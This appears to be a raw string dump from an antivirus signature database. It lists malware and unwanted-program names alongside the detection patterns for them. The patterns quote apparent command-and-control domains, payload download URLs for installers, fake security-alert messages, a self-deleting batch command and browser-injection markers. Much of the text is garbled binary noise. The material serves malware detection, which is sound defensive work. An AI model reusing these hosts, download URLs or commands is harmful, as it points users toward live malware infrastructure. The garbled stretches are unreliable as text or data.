)O-!#SCPT:TrojanDownloader:O97M/Obfuse.PKRE5!MTB dg58soestvug7fvyodsat )O.!#SCPT:TrojanDownloader:JS/Nemucod.WeirdReturn (){return\" a-z\";} .!#SCPT:TrojanDownloader:O97M/EncDoc.MS!MTB!MS1 )O.!#SCPT:TrojanDownloader:O97M/EncDoc.MS!MTB!MS1 <f>run($ )</f> .!#SCPT:TrojanDownloader:O97M/EncDoc.MS!MTB!MS3 )O.!#SCPT:TrojanDownloader:O97M/EncDoc.MS!MTB!MS3 <v>shellexecutea</v> )O.!#SCRIPT:BrowserModifier:Win32/Heazycrome!blnk http://navsmart.info .!#SCRIPT:PowerShell/Timestomp.B!lastaccesstime )O.!#SCRIPT:PowerShell/Timestomp.B!lastaccesstime ::setlastaccesstime( /!#SCPT:TrojanDownloader:O97M/EncDoc.APE!MTB!PE3 )O/!#SCPT:TrojanDownloader:O97M/EncDoc.APE!MTB!PE3 <si><t>gif</t></si> /!#SCPT:TrojanDownloader:O97M/EncDoc.DXT!MTB!DX1 )O/!#SCPT:TrojanDownloader:O97M/EncDoc.DXT!MTB!DX1 /!#SCPT:TrojanDownloader:O97M/EncDoc.EXP!MTB!EX2 )O/!#SCPT:TrojanDownloader:O97M/EncDoc.EXP!MTB!EX2 &$ /!#SCPT:TrojanDownloader:O97M/EncDoc.VBE!MTB!VE6 )O/!#SCPT:TrojanDownloader:O97M/EncDoc.VBE!MTB!VE6 \"local\\temp\\ /!#SCPT:TrojanDownloader:O97M/EncDoc.VBE!MTB!VE7 )O/!#SCPT:TrojanDownloader:O97M/EncDoc.VBE!MTB!VE7 /!#SCPT:TrojanDownloader:PowerShell/Genbhv.A!vc1 )O/!#SCPT:TrojanDownloader:PowerShell/Genbhv.A!vc1 func]::virtualalloc 0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathSqrt )O0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathSqrt math.sqrt( 0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathacos )O0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathacos ;math.acos(0. returnmath.acos(0. 0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathasin )O0!#SCPT:TrojanDownloader:JS/Nemucod.WeirdMathasin ;math.asin(0. returnmath.asin(0. 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOX!MTB!OX2 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOX!MTB!OX2 \"..\\hikos.hertolo\" 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOY!MTB!OY1 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOY!MTB!OY1 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAR!MTB!AR3 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAR!MTB!AR3 <f>goto('1rtgvrt'! 0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAH!MTB!AH3 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAH!MTB!AH3 <f>goto('9rrvrv'!h 0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAV!MTB!AV6 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAV!MTB!AV6 <f>goto('4scdac'!g 0!#SCPT:TrojanDownloader:O97M/EncDoc.IIAE!MTB!II7 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.IIAE!MTB!II7 <sheetname=\"sheet\" 0!#SCPT:TrojanDownloader:O97M/EncDoc.XFBZ!MTB!BZ1 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.XFBZ!MTB!BZ1 urlmon:zzzzzzbp%&4 0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCC!MTB!CC4 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCC!MTB!CC4 0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCD!MTB!CD4 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCD!MTB!CD4 0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCE!MTB!CE3 )O0!#SCPT:TrojanDownloader:O97M/EncDoc.XFCE!MTB!CE3 0!#TEL:SCPT:TrojanDownloader:Script/Minocor!lowfi )O0!#TEL:SCPT:TrojanDownloader:Script/Minocor!lowfi 'http://v.bddp.net )O1!#ALF:TrojanDownloader:Script/CobaltStrike.VA!MSR checkhunterr.com0 info-develop.com0 jonsonsbabyy.com0 nomadfunclub.com0 puckhunterrr.com0 servicemount.com0 serviceswork.net0 servicewikii.com0 sexyservicee.com0 )O2!#SCPT:TrojanDownloader:Script/CobaltStrike.GA!MSR cmdupdatewin.com lsasswininfo.com g0Eq PYg Q 3E^V p V`E J \"Vr A +I N0N +6C g 1 % A;L$ xf 4 xf pn cn ~`7> ] V:X w il9 2 u% R: \",G' J Q%w YEF@ ' HEF@ @w_, \" $D; -TM> y ]g x j Y3D ],TF v B=Ky Vn\\ b %S= ; N{T. J/xv 8 u1 S= /O1/ l+Q K ,teTg O{m\\xf +h7zg n03}g >lW'g F}B1g ~%1p& iyA;7 ZhvIR !Small.gen!AH !Agent.ZG !QQHelper.gen!C %s?queryid=%s http://setup1.tqzn.com/barbindsoft/barsetup.exe /http://setup1.tqzn.com/barbindsoft/barsetup.exe http://setup2.tqzn.com/barbindsoft/barsetup.exe /http://setup2.tqzn.com/barbindsoft/barsetup.exe http://setup3.tqzn.com/barbindsoft/barsetup.exe /http://setup3.tqzn.com/barbindsoft/barsetup.exe http://setup4.tqzn.com/barbindsoft/barsetup.exe /http://setup4.tqzn.com/barbindsoft/barsetup.exe] !Agent.BCB >http://g1.globo.com/Noticias/SaoPaulo/0,,MUL73439-5605,00.html c:\\winupdte.exe +http://globonoticia.iitalia.com/noticia.com !Renos.gen!F Please wait while Windows Safety Alert is being uninstalled. Close all applications. This program install on your system antispayware software. :This program install on your system antispayware software. carolus /c del %s >> NULL xyxuic.dll pkgvyg.dll Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Windows Safety Alert SYSRES] !Cimuz.T !QQHelper.C !Virtumonde.O !Virtumonde.OI@ VMDll.dll forkonce VMDll.dllforkforkonce Local_AfSysUpd \"Local_AfMainMutex www.traffic-converter.com www.7adpower.coma DllGetClassObject realgo realset DllGetClassObjectrealgorealset sityp sitypnow VMDll.dllsitypsitypnow 864.235.246.150;www.zestyfind &p://makenow.net:80) (66.220.17.157;searchaM x;Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings ,Local\\ReadURLListTimer 4Local_AfSysUpdConnectTimer \"Protection thread Registry thread *StopAndRecover thread .targetnet.com; *www.emarketmakers.com azoogleads.com; 4www.traffic-converter.com; \"infinite-ads.com; \"www.7adpower.com;g wNyDg ()1H5= :+gZ< Y0DbG 'NtV=&W !Agent.AUV http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9 http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s %s\\test_file1234.txt Software\\LifeTimePorn Software\\LifeTimePorn] !Agent.AVZ \"%s\" /VERYSILENT /REGISTRYFIX.EXE c:\\RPCInstall\\Release\\RPCInstall.pdb c:\\RPCInstall\\Release\\RPCInstall.pdb] !Zlob.gen!K !Small.CBA 'x|cc LoadLibraryAX hTTjfjjjh CreateThreadU CloseHandleU C:\\boot.ini !Agent.ZH %s=%s NUL [rename] wininit. \\usrinit.dll {5B02EBA1-EFDD-477D-A37F-05383165C9C0} ZwOpenSection MapViewOfFile regsvr32 http://www.alxup.com/bin/Up.ini \\UpAuto.ini AutoUp.exe AutoUp.exe] !Agent.ABY !Agent.PI Install Service Success,Ready Execute Work Thread... No Find Service,Ready Install Service... No Find RedGirl Server,Installing... if exist \"%s\" goto delete !*_*->seven-eleven<-*_*! %s Inject To Browser... \\tmp.bat \\tmp.bat] !Agent.PN !Agent.ABC raB3G%p status=sleep \\\\.\\pipe\\$%d$ UrlCookieStr UrlNoLoad \tUrlNoLoad B64Decode \tB64Decode B64Encode \tB64Encode BinToStr Gecko/20070309 Firefox/2.0.0.3 !Adload.gen!A Stopping %s. SetServiceStatus() failed RegisterServiceProcess \\system\\regsvr32.exe player.dll mshtmlsed.exe FP30IE.dll FP30PY.dll FP30SVR.exe 2810BB9D466D} 71572690-1156-4e36-9F2A-42587899ABDE 71572690-1156-4e36-9F2A-42587899ABDE] !Small.DBB C:\\a.exe http://ygsondheks.info/c/ /installer.exe 1@jjjj 1@jj.h !Renos.gen!G !Renos.gen!H !Renos.gen!I !Zlob.gen!L MyBGTransfer_1 \\PC Drive Tool SOFTWARE\\Ultimate Fixer C:\\WINDOWS\\sysdx.dll C:\\WINDOWS\\msvb.dll C:\\WINDOWS\\hstsys.dll C:\\WINDOWS\\hostctrl.dll 6 HTTPClient software\\products software\\products] !Zlob.gen!M BhoNew.DLLDllCanUnloadNowDllGetClassObjectDllRegisterServerDllUnregisterServer GetActiveWindowx NrI g <?0lJ 1M$DL InternetAttemptConnect NrI g 8 search.msn.com/dnserror.aspx IsDebuggerPresent] !Adialer.D !Adialer.E EvtShutdownEvtStartupinstruntes if exist \"%s\" goto Retry cmd /c start /min GetAdaptersInfo !Agent.BCD !QQHelper.gen!D D$(Wu !QQHelper.gen!E !QQHelper.gen!F !QQHelper.gen!G !QQHelper.gen!H D$$Wu <A| <Z !QQHelper.L 0$@:y !QQHelper.M !QQHelper.N !Zlob.gen!N @ U;G'>W !Zlob.gen!O !Agent.AEA !Agent.AEB !Agent.AEC !Agent.AED !Agent.AEE !Agent.AEO UA:MacOS/Bundlore.G!MTB PUA:MacOS/Bundlore.B1&PUA:MacOS/Bundlore.B2z /+PUA:MacOS/Bundlore.B1&PUA:MacOS/Bundlore.B2z PUA:MacOS/Darthminer.A!MTB PUA:MacOS/Darthminer.A1&PUA:MacOS/Darthminer.A2&PUA:MacOS/Darthminer.A3z KGPUA:MacOS/Darthminer.A1&PUA:MacOS/Darthminer.A2&PUA:MacOS/Darthminer.A3z PUA:MacOS/Fplayer.A!MTB PUA:Block:Fplayer.A&!PUA:Exceptionz &\"PUA:Block:Fplayer.A&!PUA:Exceptionz PUA:AndroidOS/Airpush.A!MTB PUA:Block:Airpush.A&!PUA:Exceptionz &\"PUA:Block:Airpush.A&!PUA:Exceptionz Perseus!MSR PUA:MacOS/MacCleaner.C!MTB PUA:Block:MacCleaner.C&!PUA:Exceptionz )%PUA:Block:MacCleaner.C&!PUA:Exceptionz !Neoreklami.AA!MSR !Jetmedia!MSR *4\\is PUA:MacOS/Jawego.A!MTB PUA:Block:Jawego.A&!PUA:Exceptionz %!PUA:Block:Jawego.A&!PUA:Exceptionz PUA:MacOS/SimpleFiles.A!MTB PUA:Block:SimpleFiles.A&!PUA:Exceptionz *&PUA:Block:SimpleFiles.A&!PUA:Exceptionz PUA:AndroidOS/Sprovider.A!MTB PUA:Block:Sprovider.A&!PUA:Exceptionz ($PUA:Block:Sprovider.A&!PUA:Exceptionz PUA:Win32/InstallCore.LL P@7%temp%\\in 0\\css\\swagent.css %temp%\\in @3%temp%\\in 0\\csshover3.htc @1%temp%\\in 0\\libeay32.dll 0\\ssleay32.dll @$aNE PUA:AndroidOS/Cooee.A!MTB PUA:Block:Cooee.A&!PUA:Exceptionz $ PUA:Block:Cooee.A&!PUA:Exceptionz PUA:MacOS/CimpliAd.A!MTB PUA:MacOS/Cimpli.A1&PUA:MacOS/Cimpli.A2&PUA:MacOS/Cimpli.A3z ?;PUA:MacOS/Cimpli.A1&PUA:MacOS/Cimpli.A2&PUA:MacOS/Cimpli.A3z PUA:MacOS/Kidlogger.D!MTB PUA:Block:Kidlogger.D&!PUA:Exceptionz ($PUA:Block:Kidlogger.D&!PUA:Exceptionz PUA:AndroidOS/RecmAds.A!MTB PUA:Block:RecmAds.A&!PUA:Exceptionz &\"PUA:Block:RecmAds.A&!PUA:Exceptionz PUA:AndroidOS/Metasploit.A!MTB PUA:Block:Metasploit.A&!PUA:Exceptionz )%PUA:Block:Metasploit.A&!PUA:Exceptionz !Filetour!MSR =. j7 PUA:MacOS/MacBooster.K!MTB PUA:Block:MacBooster.K&!PUA:Exceptionz )%PUA:Block:MacBooster.K&!PUA:Exceptionz PUA:MacOS/Didnarbois.B!MTB PUA:Block:Didnarbois.B&!PUA:Exceptionz )%PUA:Block:Didnarbois.B&!PUA:Exceptionz PUA:MacOS/Jawego.B!MTB PUA:Block:Jawego.B&!PUA:Exceptionz %!PUA:Block:Jawego.B&!PUA:Exceptionz PUA:Win32/InstallCore.M!sms PUA:Win32/InstallCore.M XYZPhRun XYZPhRunTRQ Adware:Win64/Filetour!MSR PUA:MacOS/Spigot.G!MTB PUA:Block:Spigot.G&!PUA:Exceptionz %!PUA:Block:Spigot.G&!PUA:Exceptionz PUA:MacOS/Bundlore.H!MTB PUA:Block:Bundlore.H1&!PUA:Exceptionz ($PUA:Block:Bundlore.H1&!PUA:Exceptionz !Adload.SB!MSR Release\\adviser.pdb http://yasovetn1k.ru/files/ payout temp_directory_path() temp_directory_path()] PUA:MacOS/Shopsmart.B!MTB PUA:Block:Shopsmart.B&!PUA:Exceptionz ($PUA:Block:Shopsmart.B&!PUA:Exceptionz PUA:MacOS/GT32SupportGeeks.B!MTB PUA:MacOS/GT32SupportGeeks.B!MTB PUA:Block:GT32SupportGeeks.B&!PUA:Exceptionz /+PUA:Block:GT32SupportGeeks.B&!PUA:Exceptionz PUA:MacOS/Bundlore.I!MTB PUA:Block:Bundlore.I1&PUA:Block:Bundlore.I2&PUA:Block:Bundlore.I3&!PUA:Exceptionz TPPUA:Block:Bundlore.I1&PUA:Block:Bundlore.I2&PUA:Block:Bundlore.I3&!PUA:Exceptionz PUA:MacOS/Crossrider.D!MTB PUA:Block:Crossrider.D&!PUA:Exceptionz )%PUA:Block:Crossrider.D&!PUA:Exceptionz !Goopdate!MSR PUA:MacOS/Genieo.J!MTB PUA:Block:Genieo.J&!PUA:Exceptionz %!PUA:Block:Genieo.J&!PUA:Exceptionz PUA:MacOS/Jawego.C!MTB PUA:Block:Jawego.C&!PUA:Exceptionz %!PUA:Block:Jawego.C&!PUA:Exceptionz PUA:MacOS/Pirrit.E!MTB PUA:MacOS/Pirrit.E1&PUA:MacOS/Pirrit.E2&PUA:MacOS/Pirrit.E3z ?;PUA:MacOS/Pirrit.E1&PUA:MacOS/Pirrit.E2&PUA:MacOS/Pirrit.E3z PUA:Win32/Prifou.UU P@F\\appdata\\local\\temp\\prefjsonfn.txt @\\appdata\\local\\temp\\prefjsonfn.txt PUA:MacOS/Bundlore.J!MTB PUA:MacOS/Bundlore.J1&PUA:MacOS/Bundlore.J2&!PUA:Exceptionz >:PUA:MacOS/Bundlore.J1&PUA:MacOS/Bundlore.J2&!PUA:Exceptionz !UtubeDownloader.J!rfn Misleading:Win32/PCReviver PUA:MacOS/WebShoppers.A!MTB PUA:Block:WebShoppers.A&!PUA:Exceptionz *&PUA:Block:WebShoppers.A&!PUA:Exceptionz !Small!MTB PUA:MacOS/Bundlore.K!MTB PUA:Block:Bundlore.K&!PUA:Exceptionz '#PUA:Block:Bundlore.K&!PUA:Exceptionz PUA:MacOS/Genieo.M!MTB PUA:Block:Genieo.M&!PUA:Exceptionz %!PUA:Block:Genieo.M&!PUA:Exceptionz PUA:Win32/GOM PUA:Block:GOM&!PUA:Exceptionz PUA:MacOS/Adload.D!MTB PUA:Block:Adload.D&!PUA:Exceptionz %!PUA:Block:Adload.D&!PUA:Exceptionz PUA:MacOS/CoinMiner.F!MTB PUA:Block:CoinMiner.F&!PUA:Exceptionz ($PUA:Block:CoinMiner.F&!PUA:Exceptionz PUA:Win32/Gom_Player PUA:Block:Gom_Player&!PUA:Exceptionz '#PUA:Block:Gom_Player&!PUA:Exceptionz !Fareit.VD!MTB PUA:MacOS/Maconomi.A!MTB PUA:Block:Maconomi.A&!PUA:Exceptionz '#PUA:Block:Maconomi.A&!PUA:Exceptionz PUA:MacOS/Conduit.F!MTB PUA:Block:Conduit.F&!PUA:Exceptionz &\"PUA:Block:Conduit.F&!PUA:Exceptionz PUA:MacOS/Yontoo.A!MTB PUA:Block:Yontoo.A&!PUA:Exceptionz %!PUA:Block:Yontoo.A&!PUA:Exceptionz PUA:MacOS/MacReviver.F!MTB PUA:Block:MacReviver.F&!PUA:Exceptionz )%PUA:Block:MacReviver.F&!PUA:Exceptionz PUA:MacOS/MacKeeper.EE PUA:MacOS/MacKeeper.EE1&PUA:MacOS/MacKeeper.EE2&PUA:MacOS/MacKeeper.EE3&!PUA:Exceptionz ZVPUA:MacOS/MacKeeper.EE1&PUA:MacOS/MacKeeper.EE2&PUA:MacOS/MacKeeper.EE3&!PUA:Exceptionz PUA:MacOS/Awecleaner.C!MTB PUA:Block:Awecleaner.C&!PUA:Exceptionz )%PUA:Block:Awecleaner.C&!PUA:Exceptionz PUA:MacOS/FkCodec.B!MTB PUA:Block:FkCodec.B&!PUA:Exceptionz &\"PUA:Block:FkCodec.B&!PUA:Exceptionz PUA:MacOS/HistGrabber.A!MTB PUA:Block:HistGrabber.A&!PUA:Exceptionz *&PUA:Block:HistGrabber.A&!PUA:Exceptionz PUA:Win32/Bhunext PUA:Block:Bhunext&!PUA:Exceptionz $ PUA:Block:Bhunext&!PUA:Exceptionz PUA:MacOS/VSearch.H!MTB PUA:Block:VSearch.H&!PUA:Exceptionz &\"PUA:Block:VSearch.H&!PUA:Exceptionz PUA:MacOS/SurfBuyer.C!MTB PUA:MacOS/SurfBuyer.C1&PUA:MacOS/SurfBuyer.C2&!PUA:Exceptionz @<PUA:MacOS/SurfBuyer.C1&PUA:MacOS/SurfBuyer.C2&!PUA:Exceptionz PUA:MacOS/Bundlore.L!MTB PUA:Block:Bundlore.L&!PUA:Exception '#PUA:Block:Bundlore.L&!PUA:Exception PUA:MacOS/Bundlore.L1&PUA:MacOS/Bundlore.L2&PUA:MacOS/Bundlore.L3&!PUA:Exceptionz TPPUA:MacOS/Bundlore.L1&PUA:MacOS/Bundlore.L2&PUA:MacOS/Bundlore.L3&!PUA:Exceptionz !AgentTesla.VD!MTB PUA:MacOS/CoinMiner.G!MTB PUA:Block:CoinMiner.G&!PUA:Exceptionz ($PUA:Block:CoinMiner.G&!PUA:Exceptionz PUA:MacOS/Macnist.B!MTB PUA:Block:Macnist.B&!PUA:Exceptionz &\"PUA:Block:Macnist.B&!PUA:Exceptionz PUA:MacOS/SurfBuyer.B!MTB PUA:MacOS/SurfBuyer.B1&PUA:MacOS/SurfBuyer.B2&!PUA:Exceptionz @<PUA:MacOS/SurfBuyer.B1&PUA:MacOS/SurfBuyer.B2&!PUA:Exceptionz PUA:MacOS/VSearch.I!MTB PUA:Block:VSearch.I&!PUA:Exceptionz &\"PUA:Block:VSearch.I&!PUA:Exceptionz PUA:MacOS/Didnarbois.C!MTB PUA:Block:Didnarbois.C&!PUA:Exceptionz )%PUA:Block:Didnarbois.C&!PUA:Exceptionz PUA:MacOS/CoinMiner.H!MTB PUA:Block:CoinMiner.H&!PUA:Exceptionz ($PUA:Block:CoinMiner.H&!PUA:Exceptionz PUA:AndroidOS/MonitorMinor.A!MTB PUA:AndroidOS/MonitorMinor.A!MTB PUA:Block:MonitorMinor.A&!PUA:Exceptionz +'PUA:Block:MonitorMinor.A&!PUA:Exceptionz PUA:MacOS/MacInformer.B!MTB PUA:Block:MacInformer.B&!PUA:Exceptionz *&PUA:Block:MacInformer.B&!PUA:Exceptionz PUA:MacOS/Adload.E!MTB PUA:Block:Adload.E&!PUA:Exceptionz %!PUA:Block:Adload.E&!PUA:Exceptionz !Dofoil!MSR PUA:MacOS/Shopsmart.C!MTB PUA:Block:Shopsmart.C&!PUA:Exceptionz ($PUA:Block:Shopsmart.C&!PUA:Exceptionz PUA:Win32/Ulphar.A!ml PUA:Win32/Ulphar.B!ml PUA:Win32/Ulphar.C!ml PUA:Win32/Ulphar.D!ml PUA:Script/Ulphar.A!ml PUA:Script/Ulphar.B!ml PUA:Script/Ulphar.C!ml PUA:Script/Ulphar.D!ml Program:Win32/Ulthaw.A!ml Program:Win32/Ulthaw.B!ml Program:Win32/Ulthaw.C!ml Program:Win32/Ulthaw.D!ml Program:Script/Ulthaw.A!ml Program:Script/Ulthaw.B!ml Program:Script/Ulthaw.C!ml Program:Script/Ulthaw.D!ml PUA:MacOS/DutyWatch.B!MTB PUA:Block:DutyWatch.B&!PUA:Exceptionz ($PUA:Block:DutyWatch.B&!PUA:Exceptionz PUA:MacOS/SpeedUpMac.A!MTB PUA:Block:SpeedUpMac.A&!PUA:Exceptionz )%PUA:Block:SpeedUpMac.A&!PUA:Exceptionz !Webalta!MSR PUA:MacOS/AMCleaner.P!MTB PUA:Block:AMCleaner.P&!PUA:Exceptionz ($PUA:Block:AMCleaner.P&!PUA:Exceptionz PUA:MacOS/AMCleaner.Q!MTB PUA:Block:AMCleaner.Q&!PUA:Exceptionz ($PUA:Block:AMCleaner.Q&!PUA:Exceptionz PUA:MacOS/MacBooster.L!MTB PUA:Block:MacBooster.L&!PUA:Exceptionz )%PUA:Block:MacBooster.L&!PUA:Exceptionz PUA:MacOS/Genieo.AD!MTB PUA:Block:Genieo.AD&!PUA:Exceptionz &\"PUA:Block:Genieo.AD&!PUA:Exceptionz PUA:MacOS/AMCleaner.R!MTB PUA:Block:AMCleaner.R&!PUA:Exceptionz ($PUA:Block:AMCleaner.R&!PUA:Exceptionz PUA:MacOS/Bundlore.M!MTB PUA:MacOS/Bundlore.M1&PUA:MacOS/Bundlore.M2&PUA:MacOS/Bundlore.M3&!PUA:Exceptionz TPPUA:MacOS/Bundlore.M1&PUA:MacOS/Bundlore.M2&PUA:MacOS/Bundlore.M3&!PUA:Exceptionz PUA:MacOS/SurfBuyer.D!MTB PUA:Block:SurfBuyer.D&!PUA:Exceptionz ($PUA:Block:SurfBuyer.D&!PUA:Exceptionz PUA:MacOS/AMCleaner.S!MTB PUA:Block:AMCleaner.S&!PUA:Exceptionz ($PUA:Block:AMCleaner.S&!PUA:Exceptionz PUA:Win64/CudoMiner PUA:Block:CudoMiner&!PUA:Exceptionz &\"PUA:Block:CudoMiner&!PUA:Exceptionz !NewWeb!MSR PUA:MacOS/Shopsmart.D!MTB PUA:Block:Shopsmart.D&!PUA:Exceptionz ($PUA:Block:Shopsmart.D&!PUA:Exceptionz PUA:MacOS/CoinMiner.K!MTB PUA:Block:CoinMiner.K&!PUA:Exceptionz ($PUA:Block:CoinMiner.K&!PUA:Exceptionz PUA:MacOS/AoboKeylogger.G!MTB PUA:Block:AoboKeylogger.G&!PUA:Exceptionz ,(PUA:Block:AoboKeylogger.G&!PUA:Exceptionz PUA:MacOS/AMCleaner.T!MTB PUA:Block:AMCleaner.T&!PUA:Exceptionz ($PUA:Block:AMCleaner.T&!PUA:Exceptionz PUA:MacOS/Adload.F!MTB PUA:Block:Adload.F&!PUA:Exceptionz %!PUA:Block:Adload.F&!PUA:Exceptionz App:BFGMiner App:BloodMiner %programfiles%\\blood foundation\\blood miner multilevel v0.9.2 (32bit) beta %programfiles%\\blood foundation\\blood miner multilevel v0.9.2 (64bit) beta %programfiles%\\blood foundation\\blood miner multilevel v0.9.2.2 (32bit) beta %programfiles%\\blood foundation\\blood miner multilevel v0.9.2.2 (64bit) beta %programfiles%\\blood foundation\\blood miner multilevel v0.9.2 (32bit) beta%programfiles%\\blood foundation\\blood miner multilevel v0.9.2 (64bit) beta%programfiles%\\blood foundation\\blood miner multilevel v0.9.2.2 (32bit) beta%programfiles%\\blood foundation\\blood miner multilevel v0.9.2.2 (64bit) beta hklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2 (32bit) beta hklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2 (64bit) beta hklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2.2 (32bit) beta hklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2.2 (64bit) beta hklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2 (32bit) betahklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2 (64bit) betahklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2.2 (32bit) betahklm\\software\\wow6432node\\blood foundation\\blood miner multilevel v0.9.2.2 (64bit) beta blood miner multilevel v0.9.2 (32bit) beta blood miner multilevel v0.9.2 (64bit) beta blood miner multilevel v0.9.2.2 (32bit) beta blood miner multilevel v0.9.2.2 (64bit) beta blood miner multilevel v0.9.2 (32bit) betablood miner multilevel v0.9.2 (64bit) betablood miner multilevel v0.9.2.2 (32bit) betablood miner multilevel v0.9.2.2 (64bit) beta blood foundation *CN=?bloodland co., ltd* *O=?bloodland co., ltd* *CN=?bloodland co., ltd**O=?bloodland co., ltd* ad0bb391c85bf57613591802ec3c146477fd560b ad0bb391c85bf57613591802ec3c146477fd560bz App:BMiner utqBL< H71!} App:CCMiner ccminer ccminerz App:CGMiner App:ClaymoreMiner qz[_S App:ClaymoreCryptoNoteMiner m,b^3 App:ClaymoreDualMiner k'S*o =R:hYf STCAD QXWV&P |?Yn < udioLoopTag.A&SCRIPT:JS/MagnisocBrowser.A&SCRIPT:HTML/TechMsgTollfree.A !#TEL:Trojan:JS/Tisifi.ECBLua:ContextualDropFileByEmailClient&Lua:SingleFileJSInZip&Lua:ContextJSDoubleExtension V!#TEL:Trojan:JS/Tisifi.ECBLua:ContextualDropFileByEmailClient&Lua:SingleFileJSInZip&Lua:ContextJSDoubleExtension !#AGGR:Tobeet_Msil_0580B786pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/Obfuscator.MPRESS.A U!#AGGR:Tobeet_Msil_0580B786pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/Obfuscator.MPRESS.A !#AGGR:Tobeet_Msil_2B6477B3HSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_852C9155 U!#AGGR:Tobeet_Msil_2B6477B3HSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_852C9155 !#AGGR:Tobeet_Msil_2BB622AAHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_8AE2833D U!#AGGR:Tobeet_Msil_2BB622AAHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_8AE2833D !#AGGR:Tobeet_Msil_33F287C8pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:Win32/PossibleKeylogger.C1 U!#AGGR:Tobeet_Msil_33F287C8pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:Win32/PossibleKeylogger.C1 !#AGGR:Tobeet_Msil_EC04030BHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_8AE2833D U!#AGGR:Tobeet_Msil_EC04030BHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:AutoAttrMsil_8AE2833D !#ALF:Trojan:HTML/Freyalp.BSCRIPT:JS/FreyalpFunction.B&(SCRIPT:JS/FreyalpFunction.A|SCRIPT:JS/FreyalpFunction.C) U!#ALF:Trojan:HTML/Freyalp.BSCRIPT:JS/FreyalpFunction.B&(SCRIPT:JS/FreyalpFunction.A|SCRIPT:JS/FreyalpFunction.C) !#TEL:Trojan:Win32/Tisifi.CLua:ContextFromWebmail&RPF:MsilOverlappingMethods&pea_isdamaged&SuspiciousEXEfilename U!#TEL:Trojan:Win32/Tisifi.CLua:ContextFromWebmail&RPF:MsilOverlappingMethods&pea_isdamaged&SuspiciousEXEfilename !#TEL:PowerShell/Mimikittenz.CLua:Powershell/Mimikittenz.A!credpatterns&SCRIPT:PowerShell/Mimikittenz.A!browsers R!#TEL:PowerShell/Mimikittenz.CLua:Powershell/Mimikittenz.A!credpatterns&SCRIPT:PowerShell/Mimikittenz.A!browsers !#ALF:Trojan:PowerShell/DynamicLoaderSCPT:Trojan:PowerShell/DynamicLoader1&SCPT:Trojan:PowerShell/DynamicLoader2 t%K!#ALF:Trojan:PowerShell/DynamicLoaderSCPT:Trojan:PowerShell/DynamicLoader1&SCPT:Trojan:PowerShell/DynamicLoader2 !#TEL:SCRIPT/WmiLaunchMshta_JavaScript.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchMshta_JavaScript t(H!#TEL:SCRIPT/WmiLaunchMshta_JavaScript.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchMshta_JavaScript !#TEL:SCRIPT/WmiLaunchWmic_OsGetFormat.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchWmic_OsGetFormat t(H!#TEL:SCRIPT/WmiLaunchWmic_OsGetFormat.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchWmic_OsGetFormat !#TEL:SCRIPT/WmiLaunchWorkflowCompiler.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchWorkflowCompiler t(H!#TEL:SCRIPT/WmiLaunchWorkflowCompiler.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchWorkflowCompiler !#AGGR:Tobeet_Msil_034E3D19HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV4&HSTR:InstallerFile&HSTR:FileSharingURL 